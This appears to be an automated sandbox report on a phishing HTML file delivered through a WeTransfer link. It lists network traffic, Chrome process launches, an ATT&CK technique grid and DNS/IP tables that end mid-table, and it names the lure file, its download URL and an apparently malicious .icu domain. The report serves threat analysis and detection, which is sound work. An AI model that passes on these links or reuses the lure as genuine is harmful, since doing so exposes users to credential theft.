    Source: unknownNetwork traffic detected: HTTP traffic on port 49870 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50089
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50088
    Source: unknownNetwork traffic detected: HTTP traffic on port 50079 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50090
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50092
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50091
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50094
    Source: unknownNetwork traffic detected: HTTP traffic on port 50136 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49983 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50093
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50096
    Source: unknownNetwork traffic detected: HTTP traffic on port 49938 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 50023 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50095
    Source: unknownNetwork traffic detected: HTTP traffic on port 49811 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50018
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50017
    Source: unknownNetwork traffic detected: HTTP traffic on port 50193 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50259
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50019
    Source: unknownNetwork traffic detected: HTTP traffic on port 49813 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49951 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50010
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50252
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50251
    Source: unknownNetwork traffic detected: HTTP traffic on port 49916 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50012
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50254
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50011
    Source: unknownNetwork traffic detected: HTTP traffic on port 50055 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50253
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50014
    Source: unknownNetwork traffic detected: HTTP traffic on port 50090 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50013
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50255
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50016
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50258
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50015
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50257
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50261
    Source: unknownNetwork traffic detected: HTTP traffic on port 49776 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49845 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 50215 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 50230 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50029
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50028
    Source: unknownNetwork traffic detected: HTTP traffic on port 49707 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50021
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50263
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50020
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50262
    Source: unknownNetwork traffic detected: HTTP traffic on port 50318 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50023
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50022
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50264
    Source: unknownNetwork traffic detected: HTTP traffic on port 49742 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50025
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50267
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50024
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50266
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50027
    Source: unknownNetwork traffic detected: HTTP traffic on port 49780 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49879 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50026
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50268
    Source: unknownNetwork traffic detected: HTTP traffic on port 49985 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 50264 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50270
    Source: unknownNetwork traffic detected: HTTP traffic on port 50021 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50030
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50272
    Source: unknownNetwork traffic detected: HTTP traffic on port 50138 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 50067 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50039
    Source: unknownNetwork traffic detected: HTTP traffic on port 49995 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 50298 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 50011 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49928 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50032
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50274
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50031
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50273
    Source: unknownNetwork traffic detected: HTTP traffic on port 49857 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50034
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50276
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50033
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50275
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50036
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50278
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50035
    Source: unknownHTTPS traffic detected: 184.28.90.27:443 -> 192.168.2.16:49757 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 184.28.90.27:443 -> 192.168.2.16:49772 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 4.175.87.197:443 -> 192.168.2.16:49778 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 4.175.87.197:443 -> 192.168.2.16:50053 version: TLS 1.2
    Source: classification engineClassification label: mal68.phis.win@33/7@310/1024
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps
    Source: unknownProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "about:blank"
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1992 --field-trial-handle=1904,i,14989004330455612450,13381019782503513669,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
    Source: unknownProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" "https://wetransfer.com/downloads/bd15c1f671ae60c5a56e558eb8cc43bf20241030150256/3b30cd5b9ce1ffb29d79c9118153941c20241030150256/70baef?t_exp=1730559776&t_lsid=6bd545a9-d09b-4abd-a317-124dbe9fe64d&t_network=email&t_rid=YXV0aDB8NjZlYWI0YTExODhmYzc1OGMzMmNiODIx&t_s=download_link&t_ts=1730300576&utm_campaign=TRN_TDL_01&utm"
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1992 --field-trial-handle=1904,i,14989004330455612450,13381019782503513669,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=audio.mojom.AudioService --lang=en-US --service-sandbox-type=audio --mojo-platform-channel-handle=5908 --field-trial-handle=1904,i,14989004330455612450,13381019782503513669,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=audio.mojom.AudioService --lang=en-US --service-sandbox-type=audio --mojo-platform-channel-handle=5908 --field-trial-handle=1904,i,14989004330455612450,13381019782503513669,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
    Source: Window RecorderWindow detected: More than 3 window changes detected
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Google Drive.lnk
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\YouTube.lnk
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Sheets.lnk
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Gmail.lnk
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Slides.lnk
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Docs.lnk
    ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
    Gather Victim Identity InformationAcquire InfrastructureValid AccountsWindows Management Instrumentation1
    Registry Run Keys / Startup Folder
    1
    Process Injection
    1
    Masquerading
    OS Credential DumpingSystem Service DiscoveryRemote ServicesData from Local System2
    Encrypted Channel
    Exfiltration Over Other Network MediumAbuse Accessibility Features
    CredentialsDomainsDefault AccountsScheduled Task/JobBoot or Logon Initialization Scripts1
    Registry Run Keys / Startup Folder
    1
    Process Injection
    LSASS MemoryApplication Window DiscoveryRemote Desktop ProtocolData from Removable Media1
    Non-Application Layer Protocol
    Exfiltration Over BluetoothNetwork Denial of Service
    Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)Obfuscated Files or InformationSecurity Account ManagerQuery RegistrySMB/Windows Admin SharesData from Network Shared Drive2
    Application Layer Protocol
    Automated ExfiltrationData Encrypted for Impact

    This section contains all screenshots as thumbnails, including those not shown in the slideshow.


    windows-stand
    No Antivirus matches
    No Antivirus matches
    No Antivirus matches
    No Antivirus matches
    No Antivirus matches
    NameIPActiveMaliciousAntivirus DetectionReputation
    jsdelivr.map.fastly.net
    151.101.1.229
    truefalse
      unknown
      sp-20200324121949090600000008-54648268.eu-west-1.elb.amazonaws.com
      34.249.124.146
      truefalse
        unknown
        a2372.casalemedia.com
        209.204.225.54
        truefalse
          unknown
          global.px.quantserve.com
          91.228.74.200
          truefalse
            unknown
            s.dsp-prod.demandbase.com
            34.96.71.22
            truefalse
              unknown
              p.tvpixel.com
              99.83.205.94
              truefalse
                unknown
                d-ams1.turn.com
                46.228.164.13
                truefalse
                  unknown
                  eu-eb2.3lift.com
                  13.248.245.213
                  truefalse
                    unknown
                    cdn.w55c.net
                    18.158.171.52
                    truefalse
                      unknown
                      cm.g.doubleclick.net
                      172.217.16.194
                      truefalse
                        unknown
                        idaas-ext.cph.liveintent.com
                        35.171.231.154
                        truefalse
                          unknown
                          ds-pr-bh.ybp.gysm.yahoodns.net
                          18.200.53.175
                          truefalse
                            unknown
                            www.google.com
                            142.250.184.228
                            truefalse
                              unknown
                              wetransfer.fides-cdn.ethyca.com
                              18.245.86.74
                              truefalse
                                unknown
                                imagsync-lhrpairbc.pubmatic.com
                                185.64.191.214
                                truefalse
                                  unknown
                                  cdn.brandmetrics.com
                                  172.67.69.191
                                  truefalse
                                    unknown
                                    bsp-proxy.wetransfer.net
                                    54.217.172.44
                                    truefalse
                                      unknown
                                      match.adsrvr.org
                                      3.33.220.150
                                      truefalse
                                        unknown
                                        star-mini.c10r.facebook.com
                                        157.240.251.35
                                        truefalse
                                          unknown
                                          match.prod.bidr.io
                                          54.170.178.201
                                          truefalse
                                            unknown
                                            d8ghbpr3r4dzt.cloudfront.net
                                            13.33.187.85
                                            truefalse
                                              unknown
                                              nydc1.outbrain.org
                                              64.202.112.223
                                              truefalse
                                                unknown
                                                dna8twue3dlxq.cloudfront.net
                                                13.32.121.100
                                                truefalse
                                                  unknown
                                                  firewall-external-2134955858.eu-west-1.elb.amazonaws.com
                                                  52.214.78.21
                                                  truefalse
                                                    unknown
                                                    d162h6x3rxav67.cloudfront.net
                                                    18.66.112.44
                                                    truefalse
                                                      unknown
                                                      d1ykf07e75w7ss.cloudfront.net
                                                      108.138.6.136
                                                      truefalse
                                                        unknown
                                                        download.wetransfer.com
                                                        18.245.60.84
                                                        truefalse
                                                          unknown
                                                          analytics-v2.wetransfer.com
                                                          18.245.86.11
                                                          truefalse
                                                            unknown
                                                            prod.pinterest.global.map.fastly.net
                                                            151.101.0.84
                                                            truefalse
                                                              unknown
                                                              ssum-sec.casalemedia.com
                                                              104.18.36.155
                                                              truefalse
                                                                unknown
                                                                di.rlcdn.com
                                                                35.244.174.68
                                                                truefalse
                                                                  unknown
                                                                  googleads.g.doubleclick.net
                                                                  142.250.181.226
                                                                  truefalse
                                                                    unknown
                                                                    js-sec.indexww.com
                                                                    104.18.38.76
                                                                    truefalse
                                                                      unknown
                                                                      dualstack.pinterest.map.fastly.net
                                                                      151.101.192.84
                                                                      truefalse
                                                                        unknown
                                                                        challenges.cloudflare.com
                                                                        104.18.94.41
                                                                        truefalse
                                                                          unknown
                                                                          ekstrom.wetransfer.net
                                                                          52.48.5.216
                                                                          truefalse
                                                                            unknown
                                                                            wetransfer.com
                                                                            143.204.98.97
                                                                            truefalse
                                                                              unknown
                                                                              experiments.wetransfer.com
                                                                              13.33.187.50
                                                                              truefalse
                                                                                unknown
                                                                                tagging.wetransfer.com
                                                                                18.245.46.98
                                                                                truefalse
                                                                                  unknown
                                                                                  nolan.wetransfer.net
                                                                                  18.245.162.11
                                                                                  truefalse
                                                                                    unknown
                                                                                    s0.2mdn.net
                                                                                    142.250.185.166
                                                                                    truefalse
                                                                                      unknown
                                                                                      simple-redirect-eu-west-1-kaas-blue.sre.nielsen.com
                                                                                      52.48.211.82
                                                                                      truefalse
                                                                                        unknown
                                                                                        htlb.casalemedia.com
                                                                                        104.18.36.155
                                                                                        truefalse
                                                                                          unknown
                                                                                          low0qsz1te4er83672235911c6a3.fanaticsretailgroupindividual.icu
                                                                                          188.114.96.3
                                                                                          truefalse
                                                                                            unknown
                                                                                            dg2iu7dxxehbo.cloudfront.net
                                                                                            18.172.103.101
                                                                                            truefalse
                                                                                              unknown
                                                                                              backgrounds.wetransfer.net
                                                                                              65.9.66.34
                                                                                              truefalse
                                                                                                unknown
                                                                                                insight.adsrvr.org
                                                                                                15.197.193.217
                                                                                                truefalse
                                                                                                  unknown
                                                                                                  scontent.xx.fbcdn.net
                                                                                                  157.240.251.9
                                                                                                  truefalse
                                                                                                    unknown
                                                                                                    code.jquery.com
                                                                                                    151.101.194.137
                                                                                                    truefalse
                                                                                                      unknown
                                                                                                      sni1gl.wpc.upsiloncdn.net
                                                                                                      152.199.21.175
                                                                                                      truefalse
                                                                                                        unknown
                                                                                                        rtb.adentifi.com
                                                                                                        44.213.140.1
                                                                                                        truefalse
                                                                                                          unknown
                                                                                                          ara.paa-reporting-advertising.amazon
                                                                                                          18.245.46.109
                                                                                                          truefalse
                                                                                                            unknown
                                                                                                            sync.srv.stackadapt.com
                                                                                                            3.209.70.78
                                                                                                            truefalse
                                                                                                              unknown
                                                                                                              thrtle.com
                                                                                                              54.159.18.116
                                                                                                              truefalse
                                                                                                                unknown
                                                                                                                lebowski.wetransfer.com
                                                                                                                54.228.158.30
                                                                                                                truefalse
                                                                                                                  unknown
                                                                                                                  a.nel.cloudflare.com
                                                                                                                  35.190.80.1
                                                                                                                  truefalse
                                                                                                                    unknown
                                                                                                                    ax-0001.ax-dc-msedge.net
                                                                                                                    150.171.30.10
                                                                                                                    truefalse
                                                                                                                      unknown
                                                                                                                      s.amazon-adsystem.com
                                                                                                                      98.82.157.137
                                                                                                                      truefalse
                                                                                                                        unknown
                                                                                                                        ad.doubleclick.net
                                                                                                                        172.217.23.102
                                                                                                                        truefalse
                                                                                                                          unknown
                                                                                                                          e-prod-alb-s105-us-east-1-01.adzerk.net
                                                                                                                          3.209.79.2
                                                                                                                          truefalse
                                                                                                                            unknown
                                                                                                                            api.pico.bendingspoonsapps.com
                                                                                                                            34.102.204.67
                                                                                                                            truefalse
                                                                                                                              unknown
                                                                                                                              ax-0001.ax-msedge.net
                                                                                                                              150.171.27.10
                                                                                                                              truefalse
                                                                                                                                unknown
                                                                                                                                prod-cdn.wetransfer.net
                                                                                                                                13.32.27.4
                                                                                                                                truefalse
                                                                                                                                  unknown
                                                                                                                                  dt-external-521234871.us-west-2.elb.amazonaws.com
                                                                                                                                  52.24.157.58
                                                                                                                                  truefalse
                                                                                                                                    unknown
                                                                                                                                    dsum-sec.casalemedia.com
                                                                                                                                    172.64.151.101
                                                                                                                                    truefalse
                                                                                                                                      unknown
                                                                                                                                      donny.wetransfer.com
                                                                                                                                      54.155.202.146
                                                                                                                                      truefalse
                                                                                                                                        unknown
                                                                                                                                        dt-external-217593033.us-east-1.elb.amazonaws.com
                                                                                                                                        107.20.123.147
                                                                                                                                        truefalse
                                                                                                                                          unknown
                                                                                                                                          www.datadoghq-browser-agent.com
                                                                                                                                          13.33.219.205
                                                                                                                                          truefalse
                                                                                                                                            unknown
                                                                                                                                            cdn.wetransfer.com
                                                                                                                                            143.204.98.71
                                                                                                                                            truefalse
                                                                                                                                              unknown
                                                                                                                                              auth-session-caching.wetransfer.net
                                                                                                                                              34.240.255.32
                                                                                                                                              truefalse
                                                                                                                                                unknown
                                                                                                                                                ib.anycast.adnxs.com
                                                                                                                                                185.89.210.46
                                                                                                                                                truefalse
                                                                                                                                                  unknown
                                                                                                                                                  pm.w55c.net
                                                                                                                                                  unknown
                                                                                                                                                  unknownfalse
                                                                                                                                                    unknown
                                                                                                                                                    snowplow.wetransfer.com
                                                                                                                                                    unknown
                                                                                                                                                    unknownfalse
                                                                                                                                                      unknown
                                                                                                                                                      ads.stickyadstv.com
                                                                                                                                                      unknown
                                                                                                                                                      unknownfalse
                                                                                                                                                        unknown
                                                                                                                                                        z.moatads.com
                                                                                                                                                        unknown
                                                                                                                                                        unknownfalse
                                                                                                                                                          unknown
                                                                                                                                                          pixel.adsafeprotected.com
                                                                                                                                                          unknown
                                                                                                                                                          unknownfalse
                                                                                                                                                            unknown
                                                                                                                                                            js.adsrvr.org
                                                                                                                                                            unknown
                                                                                                                                                            unknownfalse
                                                                                                                                                              unknown
                                                                                                                                                              s.company-target.com
                                                                                                                                                              unknown
                                                                                                                                                              unknownfalse
                                                                                                                                                                unknown
                                                                                                                                                                privacy.wetransfer.com
                                                                                                                                                                unknown
                                                                                                                                                                unknownfalse
                                                                                                                                                                  unknown
                                                                                                                                                                  pixel.rubiconproject.com
                                                                                                                                                                  unknown
                                                                                                                                                                  unknownfalse
                                                                                                                                                                    unknown
                                                                                                                                                                    connect.facebook.net
                                                                                                                                                                    unknown
                                                                                                                                                                    unknownfalse
                                                                                                                                                                      unknown
                                                                                                                                                                      secure-gl.imrworldwide.com
                                                                                                                                                                      unknown
                                                                                                                                                                      unknownfalse
                                                                                                                                                                        unknown
                                                                                                                                                                        1f2e7.v.fwmrm.net
                                                                                                                                                                        unknown
                                                                                                                                                                        unknownfalse
                                                                                                                                                                          unknown
                                                                                                                                                                          83rlahvezbatmc6b7zf4tpedq4dzg1730306290.darnuid.imrworldwide.com
                                                                                                                                                                          unknown
                                                                                                                                                                          unknownfalse
                                                                                                                                                                            unknown
                                                                                                                                                                            d.turn.com
                                                                                                                                                                            unknown
                                                                                                                                                                            unknownfalse
                                                                                                                                                                              unknown
                                                                                                                                                                              ir.surveywall-api.survata.com
                                                                                                                                                                              unknown
                                                                                                                                                                              unknownfalse
                                                                                                                                                                                unknown
                                                                                                                                                                                cdn.jsdelivr.net
                                                                                                                                                                                unknown
                                                                                                                                                                                unknownfalse
                                                                                                                                                                                  unknown
                                                                                                                                                                                  image8.pubmatic.com
                                                                                                                                                                                  unknown
                                                                                                                                                                                  unknownfalse
                                                                                                                                                                                    unknown
                                                                                                                                                                                    ct.pinterest.com
                                                                                                                                                                                    unknown
                                                                                                                                                                                    unknownfalse
                                                                                                                                                                                      unknown
                                                                                                                                                                                      fw.adsafeprotected.com
                                                                                                                                                                                      unknown
                                                                                                                                                                                      unknownfalse
                                                                                                                                                                                        unknown
                                                                                                                                                                                        aadcdn.msauthimages.net
                                                                                                                                                                                        unknown
                                                                                                                                                                                        unknownfalse
                                                                                                                                                                                          unknown
                                                                                                                                                                                          dt.adsafeprotected.com
                                                                                                                                                                                          unknown
                                                                                                                                                                                          unknownfalse
                                                                                                                                                                                            unknown
                                                                                                                                                                                            k8s1-event-tracker-la.lb.indexww.com
                                                                                                                                                                                            unknown
                                                                                                                                                                                            unknownfalse
                                                                                                                                                                                              unknown
                                                                                                                                                                                              pr-bh.ybp.yahoo.com
                                                                                                                                                                                              unknown
                                                                                                                                                                                              unknownfalse
                                                                                                                                                                                                unknown
                                                                                                                                                                                                cs.lkqd.net
                                                                                                                                                                                                unknown
                                                                                                                                                                                                unknownfalse
                                                                                                                                                                                                  unknown
                                                                                                                                                                                                  www.facebook.com
                                                                                                                                                                                                  unknown
                                                                                                                                                                                                  unknownfalse
                                                                                                                                                                                                    unknown
                                                                                                                                                                                                    c.amazon-adsystem.com
                                                                                                                                                                                                    unknown
                                                                                                                                                                                                    unknownfalse
                                                                                                                                                                                                      unknown
                                                                                                                                                                                                      i.liadm.com
                                                                                                                                                                                                      unknown
                                                                                                                                                                                                      unknownfalse
                                                                                                                                                                                                        unknown
                                                                                                                                                                                                        public.profitwell.com
                                                                                                                                                                                                        unknown
                                                                                                                                                                                                        unknownfalse
                                                                                                                                                                                                          unknown
                                                                                                                                                                                                          collector.brandmetrics.com
                                                                                                                                                                                                          unknown
                                                                                                                                                                                                          unknownfalse
                                                                                                                                                                                                            unknown
                                                                                                                                                                                                            NameMaliciousAntivirus DetectionReputation
                                                                                                                                                                                                            file:///C:/Users/user/Downloads/Technical_Specifications_Datasheet_&_Project_Blueprint.htmltrue
                                                                                                                                                                                                              unknown
                                                                                                                                                                                                              • No. of IPs < 25%
                                                                                                                                                                                                              • 25% < No. of IPs < 50%
                                                                                                                                                                                                              • 50% < No. of IPs < 75%
                                                                                                                                                                                                              • 75% < No. of IPs
                                                                                                                                                                                                              IPDomainCountryFlagASNASN NameMalicious
                                                                                                                                                                                                              34.241.194.212
                                                                                                                                                                                                              unknownUnited States
                                                                                                                                                                                                              16509AMAZON-02USfalse
                                                                                                                                                                                                              142.250.186.68
                                                                                                                                                                                                              unknownUnited States
                                                                                                                                                                                                              15169GOOGLEUSfalse
                                                                                                                                                                                                              151.101.0.84
                                                                                                                                                                                                              prod.pinterest.global.map.fastly.netUnited States
                                                                                                                                                                                                              54113FASTLYUSfalse
                                                                                                                                                                                                              65.9.66.18
                                                                                                                                                                                                              unknownUnited States
                                                                                                                                                                                                              16509AMAZON-02USfalse
                                                                                                                                                                                                              91.228.74.200
                                                                                                                                                                                                              global.px.quantserve.comUnited Kingdom
                                                                                                                                                                                                              27281QUANTCASTUSfalse
                                                                                                                                                                                                              54.217.17.146
                                                                                                                                                                                                              unknownUnited States
                                                                                                                                                                                                              16509AMAZON-02USfalse
                                                                                                                                                                                                              98.82.157.137
                                                                                                                                                                                                              s.amazon-adsystem.comUnited States
                                                                                                                                                                                                              11351TWC-11351-NORTHEASTUSfalse
                                                                                                                                                                                                              52.16.248.34
                                                                                                                                                                                                              unknownUnited States
                                                                                                                                                                                                              16509AMAZON-02USfalse
                                                                                                                                                                                                              143.204.98.97
                                                                                                                                                                                                              wetransfer.comUnited States
                                                                                                                                                                                                              16509AMAZON-02USfalse
                                                                                                                                                                                                              54.228.158.30
                                                                                                                                                                                                              lebowski.wetransfer.comUnited States
                                                                                                                                                                                                              16509AMAZON-02USfalse
                                                                                                                                                                                                              35.190.80.1
                                                                                                                                                                                                              a.nel.cloudflare.comUnited States
                                                                                                                                                                                                              15169GOOGLEUSfalse
                                                                                                                                                                                                              35.171.231.154
                                                                                                                                                                                                              idaas-ext.cph.liveintent.comUnited States
                                                                                                                                                                                                              14618AMAZON-AESUSfalse
                                                                                                                                                                                                              3.209.70.78
                                                                                                                                                                                                              sync.srv.stackadapt.comUnited States
                                                                                                                                                                                                              14618AMAZON-AESUSfalse
                                                                                                                                                                                                              172.67.69.191
                                                                                                                                                                                                              cdn.brandmetrics.comUnited States
                                                                                                                                                                                                              13335CLOUDFLARENETUSfalse
                                                                                                                                                                                                              18.245.86.11
                                                                                                                                                                                                              analytics-v2.wetransfer.comUnited States
                                                                                                                                                                                                              16509AMAZON-02USfalse
                                                                                                                                                                                                              34.249.124.146
                                                                                                                                                                                                              sp-20200324121949090600000008-54648268.eu-west-1.elb.amazonaws.comUnited States
                                                                                                                                                                                                              16509AMAZON-02USfalse
                                                                                                                                                                                                              34.247.9.27
                                                                                                                                                                                                              unknownUnited States
                                                                                                                                                                                                              16509AMAZON-02USfalse
                                                                                                                                                                                                              1.1.1.1
                                                                                                                                                                                                              unknownAustralia
                                                                                                                                                                                                              13335CLOUDFLARENETUSfalse
                                                                                                                                                                                                              13.248.245.213
                                                                                                                                                                                                              eu-eb2.3lift.comUnited States
                                                                                                                                                                                                              16509AMAZON-02USfalse
                                                                                                                                                                                                              54.159.18.116
                                                                                                                                                                                                              thrtle.comUnited States
                                                                                                                                                                                                              14618AMAZON-AESUSfalse
                                                                                                                                                                                                              3.209.79.2
                                                                                                                                                                                                              e-prod-alb-s105-us-east-1-01.adzerk.netUnited States
                                                                                                                                                                                                              14618AMAZON-AESUSfalse
                                                                                                                                                                                                              18.66.112.44
